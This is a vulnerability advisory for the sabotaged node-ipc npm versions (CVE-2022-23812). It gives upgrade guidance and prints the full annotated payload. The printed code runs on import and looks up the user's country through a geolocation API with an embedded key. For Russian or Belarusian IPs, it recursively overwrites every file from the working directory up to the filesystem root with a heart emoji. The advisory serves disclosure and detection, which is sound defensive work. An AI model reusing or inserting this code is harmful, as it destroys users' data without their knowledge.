Malicious Package Affecting node-ipc package, versions >=10.1.1 <10.1.3
Threat Intelligence
Exploit Maturity
Mature
EPSS
0.91% (84th
percentile)
- Snyk ID SNYK-JS-NODEIPC-2426370
- published 16 Mar 2022
- disclosed 16 Mar 2022
- credit Tyler Resch
Introduced: 16 Mar 2022
Malicious CVE-2022-23812
How to fix?
Upgrade node-ipc to version 10.1.3 or higher. Before choosing a target version, read the note in the Overview about versions 11.0.0 onwards.
Overview
node-ipc is a malicious package. This package contains malicious code that targets users whose IP address is located in Russia or Belarus and overwrites their files with a heart emoji.
Note: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package, which includes potentially undesired behavior.
Malicious Code:
Note: Don't run it!
import u from "path";
import a from "fs";
import o from "https";
// Analyst note: this timer is registered at module top level, so importing the
// module is enough to schedule it; no exported function has to be called.
// Every string constant is base64-encoded, which keeps the URL, the paths and the
// country names out of plain-text searches of the package source.
setTimeout(function () {
// Random gate: Math.round(Math.random() * 4) yields 0..4 and execution continues
// only for 0 or 1, so most loads return here and the behaviour is intermittent.
const t = Math.round(Math.random() * 4);
if (t > 1) {
return;
}
const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
// Outbound HTTPS GET to a third-party IP-geolocation API. An IPC library making
// this request at load time is a network-level detection point.
o.get(n.toString("utf8"), function (t) {
// Runs for each "data" event; every chunk is parsed below as if it were a
// complete JSON document.
t.on("data", function (t) {
// Decoded values, in order: "./", "../", "../../", "/", "country_name",
// "russia", "belarus".
const n = Buffer.from("Li8=", "base64");
const o = Buffer.from("Li4v", "base64");
const r = Buffer.from("Li4vLi4v", "base64");
const f = Buffer.from("Lw==", "base64");
const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
const e = Buffer.from("cnVzc2lh", "base64");
const i = Buffer.from("YmVsYXJ1cw==", "base64");
try {
const s = JSON.parse(t.toString("utf8"));
// Case-insensitive substring match on the response's country_name field.
const u = s[c.toString("utf8")].toLowerCase();
const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus
if (a) {
// Four walks, each called with a single argument: the working directory, its
// parent, its grandparent, and the filesystem root. The relative paths resolve
// against the process working directory.
h(n.toString("utf8"));
h(o.toString("utf8"));
h(r.toString("utf8"));
h(f.toString("utf8"));
}
// Parse and lookup failures are swallowed: nothing is logged or rethrown.
} catch (t) {}
});
});
// Start delay is a random whole number of milliseconds, at most 1000.
}, Math.ceil(Math.random() * 1e3));
// Analyst note: h walks directory n recursively and overwrites the files it finds.
//   n - directory to walk.
//   o - substring a file path must contain for the file to be overwritten.
// Both parameters default to "". The callers in the timer callback pass only n,
// so o stays "" and the indexOf(o) >= 0 test below is true for every path.
// Returns f (through a Promise, since the function is async); the callers in the
// timer callback discard the result.
async function h(n = "", o = "") {
if (!a.existsSync(n)) {
return;
}
let r = [];
try {
r = a.readdirSync(n);
// An unreadable directory leaves r empty, so the loop below does nothing.
} catch (t) {}
const f = [];
// Decodes to the heart emoji (U+2764 U+FE0F); this is the replacement content.
const c = Buffer.from("4p2k77iP", "base64");
for (var e = 0; e < r.length; e++) {
const i = u.join(n, r[e]);
let t = null;
try {
// lstatSync reports on the directory entry itself, not on a symlink's target.
t = a.lstatSync(i);
} catch (t) {
continue;
}
if (t.isDirectory()) {
// Recurse into the subdirectory. h is declared async, so s is a Promise; the
// length comparison on the next line is therefore false and f stays empty.
const s = h(i, o);
s.length > 0 ? f.push(...s) : null;
} else if (i.indexOf(o) >= 0) {
try {
// writeFile replaces the whole file content. The empty callback ignores write
// errors such as permission failures. Recovery of overwritten files depends on
// backups.
a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with `❤️`
} catch (t) {}
}
}
return f;
}
// The module's only exports: one boolean constant, published both as the named
// binding `ssl` and as the default export. Nothing else in this listing reads it.
export const ssl = true;
export default ssl;
CVSS Scores
version 3.1